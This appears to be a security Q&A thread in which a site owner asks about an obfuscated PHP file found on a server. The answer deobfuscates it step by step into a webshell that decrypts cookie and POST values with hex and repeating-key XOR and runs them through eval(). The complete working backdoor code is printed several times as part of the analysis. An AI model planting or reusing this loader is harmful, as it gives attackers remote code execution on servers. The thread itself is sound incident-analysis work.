
Can someone please help me understand this code: what does it do, and what kind of encoding is it? Can it be removed automatically over SSH? (Many, many more similar files have been found.)

<?php
// Obfuscated PHP loader as found on the server, collapsed onto one line.
// $zvqhai is a character table; $npazfw is built from it one character at a
// time so that no function name appears as a literal (it resolves to pack,
// str_repeat, substr, explode, array_merge, strlen and count, plus a fixed
// UUID-like key suffix and the '#' separator). The foreach then treats every
// cookie and POST value as a hex-encoded, XOR-encrypted payload and eval()s
// any that decodes to the expected form. This is a backdoor indicator, not a
// program to be repaired; the deobfuscated reading follows below.
$zvqhai = 'k-98i3v\'raxn*ycdml#u64_gebts2oH5pf';$npazfw = Array();$npazfw[] = $zvqhai[30].$zvqhai[12];$npazfw[] = $zvqhai[9].$zvqhai[24].$zvqhai[21].$zvqhai[15].$zvqhai[2].$zvqhai[21].$zvqhai[24].$zvqhai[15].$zvqhai[1].$zvqhai[33].$zvqhai[14].$zvqhai[24].$zvqhai[21].$zvqhai[1].$zvqhai[21].$zvqhai[21].$zvqhai[9].$zvqhai[3].$zvqhai[1].$zvqhai[25].$zvqhai[14].$zvqhai[25].$zvqhai[28].$zvqhai[1].$zvqhai[25].$zvqhai[25].$zvqhai[20].$zvqhai[3].$zvqhai[2].$zvqhai[15].$zvqhai[14].$zvqhai[2].$zvqhai[31].$zvqhai[28].$zvqhai[5].$zvqhai[31];$npazfw[] = $zvqhai[18];$npazfw[] = $zvqhai[14].$zvqhai[29].$zvqhai[19].$zvqhai[11].$zvqhai[26];$npazfw[] = $zvqhai[27].$zvqhai[26].$zvqhai[8].$zvqhai[22].$zvqhai[8].$zvqhai[24].$zvqhai[32].$zvqhai[24].$zvqhai[9].$zvqhai[26];$npazfw[] = $zvqhai[24].$zvqhai[10].$zvqhai[32].$zvqhai[17].$zvqhai[29].$zvqhai[15].$zvqhai[24];$npazfw[] = $zvqhai[27].$zvqhai[19].$zvqhai[25].$zvqhai[27].$zvqhai[26].$zvqhai[8];$npazfw[] = $zvqhai[9].$zvqhai[8].$zvqhai[8].$zvqhai[9].$zvqhai[13].$zvqhai[22].$zvqhai[16].$zvqhai[24].$zvqhai[8].$zvqhai[23].$zvqhai[24];$npazfw[] = $zvqhai[27].$zvqhai[26].$zvqhai[8].$zvqhai[17].$zvqhai[24].$zvqhai[11];$npazfw[] = $zvqhai[32].$zvqhai[9].$zvqhai[14].$zvqhai[0];foreach ($npazfw[7]($_COOKIE, $_POST) as $jgbht => $mbfusps){function dopvqef($npazfw, $jgbht, $dxflrm){return $npazfw[6]($npazfw[4]($jgbht . $npazfw[1], ($dxflrm / $npazfw[8]($jgbht)) + 1), 0, $dxflrm);}function awtsdc($npazfw, $wiuhpx){return @$npazfw[9]($npazfw[0], $wiuhpx);}function qjgaieb($npazfw, $wiuhpx){$vyaygn = $npazfw[3]($wiuhpx) % 3;if (!$vyaygn) {eval($wiuhpx[1]($wiuhpx[2]));exit();}}$mbfusps = awtsdc($npazfw, $mbfusps);qjgaieb($npazfw, $npazfw[5]($npazfw[2], $mbfusps ^ dopvqef($npazfw, $jgbht, $npazfw[8]($mbfusps))));}



Beautifying this code somewhat gives me this:

// String-obfuscation table: every name the loader needs is assembled one
// character at a time from the $zvqhai alphabet so that nothing searchable
// (pack, eval-adjacent helpers, the key suffix) appears as a literal.
// Decoded values, by index (see the dump further down):
$zvqhai = 'k-98i3v\'raxn*ycdml#u64_gebts2oH5pf';
$npazfw = Array();
$npazfw[] = $zvqhai[30] . $zvqhai[12]; // [0] "H*" - pack() format: hex string -> raw bytes
$npazfw[] = $zvqhai[9] . $zvqhai[24] . $zvqhai[21] . $zvqhai[15] . $zvqhai[2] . $zvqhai[21] . $zvqhai[24] . $zvqhai[15] . $zvqhai[1] . $zvqhai[33] . $zvqhai[14] . $zvqhai[24] . $zvqhai[21] . $zvqhai[1] . $zvqhai[21] . $zvqhai[21] . $zvqhai[9] . $zvqhai[3] . $zvqhai[1] . $zvqhai[25] . $zvqhai[14] . $zvqhai[25] . $zvqhai[28] . $zvqhai[1] . $zvqhai[25] . $zvqhai[25] . $zvqhai[20] . $zvqhai[3] . $zvqhai[2] . $zvqhai[15] . $zvqhai[14] . $zvqhai[2] . $zvqhai[31] . $zvqhai[28] . $zvqhai[5] . $zvqhai[31]; // [1] "ae4d94ed-fce4-44a8-bcb2-bb689dc95235" - fixed suffix appended to the XOR key; a useful content signature for sibling copies
$npazfw[] = $zvqhai[18]; // [2] "#" - field separator inside the decrypted payload
$npazfw[] = $zvqhai[14] . $zvqhai[29] . $zvqhai[19] . $zvqhai[11] . $zvqhai[26]; // [3] "count"
$npazfw[] = $zvqhai[27] . $zvqhai[26] . $zvqhai[8] . $zvqhai[22] . $zvqhai[8] . $zvqhai[24] . $zvqhai[32] . $zvqhai[24] . $zvqhai[9] . $zvqhai[26]; // [4] "str_repeat"
$npazfw[] = $zvqhai[24] . $zvqhai[10] . $zvqhai[32] . $zvqhai[17] . $zvqhai[29] . $zvqhai[15] . $zvqhai[24]; // [5] "explode"
$npazfw[] = $zvqhai[27] . $zvqhai[19] . $zvqhai[25] . $zvqhai[27] . $zvqhai[26] . $zvqhai[8]; // [6] "substr"
$npazfw[] = $zvqhai[9] . $zvqhai[8] . $zvqhai[8] . $zvqhai[9] . $zvqhai[13] . $zvqhai[22] . $zvqhai[16] . $zvqhai[24] . $zvqhai[8] . $zvqhai[23] . $zvqhai[24]; // [7] "array_merge"
$npazfw[] = $zvqhai[27] . $zvqhai[26] . $zvqhai[8] . $zvqhai[17] . $zvqhai[24] . $zvqhai[11]; // [8] "strlen"
$npazfw[] = $zvqhai[32] . $zvqhai[9] . $zvqhai[14] . $zvqhai[0]; // [9] "pack"

// Walks every cookie and POST parameter (array_merge($_COOKIE, $_POST)); each
// value is a candidate encrypted payload and its own parameter name is part of
// the key. NOTE(review): the three functions below are declared inside the loop
// body, so a second iteration re-executes the declarations and PHP aborts with
// a "Cannot redeclare" fatal error unless the first parameter already caused
// exit() - those fatals in the error log are one way such a file shows up.
foreach($npazfw[7]($_COOKIE, $_POST) as $jgbht => $mbfusps)
{
    // Keystream of exactly $dxflrm bytes:
    // substr(str_repeat($jgbht . "<uuid suffix>", $dxflrm / strlen($jgbht) + 1), 0, $dxflrm)
    function dopvqef($npazfw, $jgbht, $dxflrm)
    {
        return $npazfw[6]($npazfw[4]($jgbht . $npazfw[1], ($dxflrm / $npazfw[8]($jgbht)) + 1) , 0, $dxflrm);
    }

    // pack("H*", $wiuhpx): hex string -> raw bytes. The '@' suppresses the
    // warning pack() emits on non-hex input, so ordinary parameters fail silently.
    function awtsdc($npazfw, $wiuhpx)
    {
        return @$npazfw[9]($npazfw[0], $wiuhpx);
    }

    // Dispatch: fires when the '#'-split payload has a multiple of 3 fields
    // (count() % 3 == 0; explode() never yields 0 fields, so in practice 3).
    // Field [1] is a function name applied to field [2] and the result is
    // eval()'d; field [0] is not used here.
    function qjgaieb($npazfw, $wiuhpx)
    {
        $vyaygn = $npazfw[3]($wiuhpx) % 3;
        if (!$vyaygn)
        {
            eval($wiuhpx[1]($wiuhpx[2]));
            exit();
        }
    }

    // hex -> bytes, XOR with the repeating key, split on '#', then dispatch.
    $mbfusps = awtsdc($npazfw, $mbfusps);
    qjgaieb($npazfw, $npazfw[5]($npazfw[2], $mbfusps ^ dopvqef($npazfw, $jgbht, $npazfw[8]($mbfusps))));
}

On its own this isn't much use, although it does seem to be a webshell. Let's dig into it a bit more. Intuition tells me that the first 12 lines or so are for string obfuscation, and that dumping the contents of $npazfw will give us the real string values. To do this we can remove the foreach loop and just run this:

// Prints each decoded table entry as "index => value", one per line.
// The entries were appended with [], so iteration order is 0..n-1.
foreach ($npazfw as $index => $entry) {
    echo "{$index} => {$entry}\n";
}

The results are:

0 => H*
1 => ae4d94ed-fce4-44a8-bcb2-bb689dc95235
2 => #
3 => count
4 => str_repeat
5 => explode
6 => substr
7 => array_merge
8 => strlen
9 => pack

This helps a lot! We can now use this to deobfuscate a lot of the rest of it.

Renaming the functions, giving the variables proper names, and removing the redundant $npazfw parameter, we get this:

// Every cookie and POST parameter is tried as a payload; the parameter name is
// half of the XOR key and the hard-coded UUID is the other half, so that UUID is
// the only fixed secret (and a good content signature for sibling files that
// share it). NOTE(review): the functions are declared inside the loop body, so a
// second iteration re-runs the declarations and PHP stops with a "Cannot
// redeclare" fatal error unless the first parameter already triggered exit().
foreach(array_merge($_COOKIE, $_POST) as $input_value_name => $input_value)
{
    // Repeating-key stream: "<name><uuid>" repeated enough times, cut to $len bytes.
    function keystream_generate($input_value_name, $len)
    {
        return substr(str_repeat($input_value_name . "ae4d94ed-fce4-44a8-bcb2-bb689dc95235", ($len / strlen($input_value_name)) + 1) , 0, $len);
    }

    // Hex string -> raw bytes; '@' hides the warning pack() emits on non-hex input,
    // so ordinary parameters are dropped silently rather than logged.
    function bytesfromhex($hex)
    {
        return @pack("H*", $hex);
    }

    // Runs the decoded payload: $params[1] is a function name applied to
    // $params[2] (presumably a decoding function - cannot tell from this code)
    // and the result is eval()'d. $params[0] is unused here.
    function execute_code($params)
    {
        $param_count_mod3 = count($params) % 3;
        if (!$param_count_mod3) /* count($params) is a multiple of 3; explode() never yields 0 fields, so in practice this means exactly 3 */
        {
            eval($params[1]($params[2]));
            exit();
        }
    }

    // hex -> bytes, XOR with the keystream, split on '#', dispatch.
    $input_value = bytesfromhex($input_value);
    execute_code(explode("#", $input_value ^ keystream_generate($input_value_name, strlen($input_value))));
}

Effectively, this loops over every cookie and POST parameter looking for a valid encrypted command payload: each value is hex-decoded, XOR-decrypted with a repeating key built from the parameter's own name plus the hard-coded UUID, split on `#`, and, if it has the expected shape, passed to eval(). So the "encoding" you are seeing is hex on top of a repeating-key XOR, not a standard cipher.

As for what to do about it, I recommend that you read this question. Deleting the files over SSH removes the shells but not whatever let the attacker write them in the first place, so expect them to reappear unless the original entry point is found and closed.

Polynomial